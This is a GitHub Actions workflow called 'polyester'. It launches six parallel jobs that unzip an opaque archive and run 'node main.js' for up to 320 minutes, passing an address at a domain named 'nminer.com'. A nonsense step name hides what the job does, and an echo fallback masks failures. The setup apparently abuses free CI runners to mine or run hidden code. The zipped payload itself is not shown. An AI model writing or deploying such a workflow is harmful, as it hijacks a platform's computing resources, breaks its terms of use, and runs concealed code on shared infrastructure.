name: polyester
on:
  push:
    branches: [ "main" ]
    paths:
      - "polyester.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip polyester.zip
        run: |
          sudo apt install -y unzip
          unzip polyester.zip

      - name: unexpectedly lack showboat drat regularly but derby
        run: |
          npm install --ignore-scripts
          timeout 320m node main.js mathsubhas10@nminer.com || echo "polyester executed"